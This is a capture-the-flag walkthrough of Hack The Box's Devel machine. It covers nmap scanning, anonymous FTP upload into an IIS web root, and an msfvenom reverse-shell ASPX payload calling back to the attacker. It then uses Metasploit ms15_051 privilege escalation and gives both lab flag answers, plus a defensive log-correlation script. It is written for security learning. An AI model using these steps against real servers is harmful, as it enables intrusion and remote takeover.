Hack The Box: Devel – Walkthrough (Guided Mode)

Hi! It is time to look at the Devel machine on Hack The Box. This challenge has it all: NMap, Metasploit, remote code execution and exploits. Let’s have fun!

This machine is currently free to play to promote the new guided mode that HTB offers on retired easy machines.

Devel info

Machine URL: https://app.hackthebox.com/machines/Devel

I am making these walkthroughs to keep myself motivated to learn cyber security, and to make sure I retain the knowledge gained from HTB's machines.
Join me in learning cyber security. I will try to explain concepts as I go, to differentiate myself from other walkthroughs.



1: What is the name of the service running on TCP port `21` on the target machine?

It’s time to get started. Let’s start up a Pwnbox or, if you prefer, connect to the machine using OpenVPN.

As always, to find out the open ports we can use Nmap. Use the following command:

nmap -sV -sC -v <target ip>

The argument -sV does version detection, -sC runs the default scripts, while -v adds more verbose output. This should be enough to get started.

You should see two open ports.

NMap results

We got two open ports: port 21 running an FTP service, and port 80 running HTTP (Hypertext Transfer Protocol), the default port used to send and receive unencrypted web pages.

If we visit the web service in the browser, we can see that IIS 7 is running.

IIS7 web server

We will look more at this later.

The task relates to port 21, and we can observe that it is running Microsoft ftpd, a Windows implementation of an FTP service. Also important: the scan output mentions that the service allows anonymous access. More on this in a moment.

What is the name of the service running on TCP port `21` on the target machine?

Answer: Microsoft ftpd


2: Which basic FTP command can be used to upload a single file onto the server?

Let’s move on!

We can try accessing the FTP anonymously:

ftp anonymous@10.10.10.5

Just press Enter when asked for a password. You will get access. Enter dir to get a list of files on the FTP server.

Connecting to the ftp anonymously

We see a bunch of files, including some reverse shells, but also some related to the IIS service. Let’s have a look around. Files can be downloaded to your machine by using the get command.

Quick note: A lot of files disappeared from the FTP server the following morning when I was writing this article. They seem to be files uploaded by other users. You will probably only see the image file and some IIS related files.

If we have a look at the welcome.png image, it looks like the same image as on the web page. Could the files be accessible from the web page we found earlier? Let’s try and visit the welcome.png file in the browser.

Files from the FTP root are accessible through the web server

Yes, we can! The same goes for other files:

Same goes for the greff text file

And there are even some reverse shells (ASPX).

And even some reverse shells from other users

It turns out this is a critical vulnerability: the FTP root and the web root are the same directory, so anything an anonymous FTP user uploads is served by IIS, and server-side script files are executed rather than just displayed. We call this Remote Code Execution.
The FTP server might allow us to upload our own reverse shell to the server, which we can then run by entering the URL of the file in the browser.

Note: Other web shells, such as the .php files, are quite useless here because we are dealing with an IIS (ASP.NET) web server, not Apache. PHP scripts are turned off by default.

We can upload files to the FTP server by using the put command. Let’s see if this works. We can quickly create a file with the touch command and echo some content into it. Afterwards, we can put it onto the FTP server.

We can upload to the FTP by using the put command

And sure enough it works!
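To see this chain from the defender’s side, here is an added example (not from the walkthrough, HTB or Microsoft) that correlates a constructed FTP log with a constructed IIS web log and flags an anonymous upload of a server-executable file that is later fetched over HTTP. The field layouts are a simplified assumption, not the exact IIS defaults; 10.10.10.5 is the box from this walkthrough and the client addresses are made up.

```python
import os
from datetime import datetime
# Constructed sample logs in a simplified space-separated W3C-style layout (a
# subset of IIS fields, not the exact IIS default). 10.10.10.5 is the Devel
# box from the walkthrough; the client addresses are made up.
FTP_FIELDS = ["date", "time", "c_ip", "user", "method", "uri", "status"]
FTP_LOG = """\
2023-05-01 10:00:01 10.10.14.2 anonymous USER anonymous 331
2023-05-01 10:00:10 10.10.14.2 anonymous STOR payload.aspx 226
2023-05-01 10:05:00 10.10.14.9 anonymous STOR notes.txt 226
2023-05-01 10:05:30 10.10.14.9 anonymous STOR shell.aspx 550
"""
WEB_FIELDS = ["date", "time", "s_ip", "method", "uri", "query", "port", "user", "c_ip", "status"]
WEB_LOG = """\
2023-05-01 10:00:30 10.10.10.5 GET /payload.aspx - 80 - 10.10.14.2 200
2023-05-01 10:06:00 10.10.10.5 GET /notes.txt - 80 - 10.10.14.9 200
2023-05-01 10:07:00 10.10.10.5 GET /welcome.png - 80 - 10.10.14.3 200
"""
# Extensions IIS hands to the ASP.NET handler: a request for one is code execution.
SCRIPT_EXTS = {".aspx", ".asp", ".ashx", ".asmx"}

def parse(text, fields):
    """Turn each non-comment log line into a dict keyed by `fields`."""
    return [dict(zip(fields, line.split()))
            for line in text.splitlines() if line and not line.startswith("#")]

def stamp(row):
    return datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")

def basename(uri):
    return uri.rsplit("/", 1)[-1].lower()

def find_upload_then_execute(ftp_text, web_text, window_s=3600):
    """Alert on each completed STOR of a script file that is later requested over HTTP."""
    web = parse(web_text, WEB_FIELDS)
    alerts = []
    for up in parse(ftp_text, FTP_FIELDS):
        name = basename(up["uri"])
        # 226 = transfer complete; a rejected STOR (550) never landed in the web root.
        if up["method"] != "STOR" or up["status"] != "226":
            continue
        if os.path.splitext(name)[1] not in SCRIPT_EXTS:
            continue
        for req in web:
            delta = (stamp(req) - stamp(up)).total_seconds()
            if basename(req["uri"]) == name and 0 <= delta <= window_s:
                alerts.append({"file": name, "uploader": f"{up['user']}@{up['c_ip']}",
                               "requested_by": req["c_ip"], "seconds_after_upload": delta})
    return alerts
```

The plain-text upload (notes.txt) and the rejected upload (shell.aspx, status 550) produce no alert; only the completed .aspx upload that is subsequently requested does.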

2. Which basic FTP command can be used to upload a single file onto the server?

Answer: put


3. Are files put into the FTP root available via the webserver?

This one we answered before. We can access files within the FTP root via the webserver.

3. Are files put into the FTP root available via the webserver?

Answer: yes


Task 4. What file extension is executed as a script on this webserver? Don’t include the `.`.

The way forward is clear now. We need to upload a payload (to gain a reverse shell) and run it through the webserver. We can find a payload and upload it to the server.

I found one here:
https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx

You can then simply edit the host IP address and port number in the script.

Alternatively, you can create one with msfvenom. For Windows hosts, a commonly used payload is windows/meterpreter/reverse_tcp.

You can create a payload with the following line:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your attacker tun0 IP4> LPORT=6969 -f aspx > payload.aspx

You should see the payload.aspx file on your machine.

Now login to the FTP by using the previously used command:

ftp anonymous@10.10.10.5

And enter:

put payload.aspx

Now we should be able to run the payload through the webserver, but first we have to start up a reverse listener through msfconsole. Run the following commands in order:

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 6969

run

Setting up a reverse shell listener through metasploit

Now the listener is running. Proceed by executing the payload file by accessing it in your browser:

Running the payload!

We got a reverse shell! This also confirms the answer to this task’s question: aspx. We used a payload with this file extension to gain a reverse shell.

We gained a reverse shell

4. What file extension is executed as a script on this webserver? Don’t include the `.`.

Answer: aspx


5. Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?

Let’s move on and find a way to escalate our privileges. The question points us in the right direction. I quickly found out that there is a module called local_exploit_suggester, which we can run to list possible ways to escalate privileges.

We can run this through our active meterpreter session, which can also run all sorts of other commands, such as sysinfo:

Sysinfo results

And getuid:

Getuid results

But anyway, back to the answer:

Answer: local_exploit_suggester


Submit the flag located on the babis user’s desktop.

Now let’s get those flags!

We can run the previously mentioned module with the following command:

run post/multi/recon/local_exploit_suggester

The module finds a bunch of exploits. Tasty!

Listing system exploits

I had success with the client_copy_image exploit. Now follow my lead:

1. First, background your meterpreter shell (Control + Z).
2. Note the session ID; we will need it in a moment.
3. Activate the module:

use exploit/windows/local/ms15_051_client_copy_image

4. Show the settings we have to set:

show options

5. Set the session to your backgrounded session. This is the only required option that is not set:

set SESSION <your session id>

Configuring the client_copy_image exploit

6. Now run the exploit:

run

That should do it!

We have escalated our privileges

We got escalated privileges!! YAY!

Now, finally, enter shell to get access to a normal Windows cmd.

Now we just have to find the babis user directory. Change directories to c:\users and you will find the babis directory.

Navigating to the babis user directory

Proceed by entering the desktop:

Finding the flag on the desktop

Read the user.txt file by using type:

Reading the babis user flag

Submit the flag located on the babis user’s desktop.

Answer: e51e6175b46521de4efcac86020fe403


Submit the flag located on the administrator’s desktop.

Now do the same for the administrator’s flag.

Reading the administrator flag

Submit the flag located on the administrator’s desktop.

Answer: 592657ada41522d08bda65feb0a4186e


Congratulations

Great job. We are done! I hope you learned a bunch about using nmap, metasploit and reverse shells. Find more of my walkthroughs here.


Like my articles?

You are welcome to share my article with friends 🙂
I would be even more grateful if you support me by buying me a cup of coffee:

Buy me a coffee

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

https://referral.hackthebox.com/mzwwXlg

Happy Hacking!
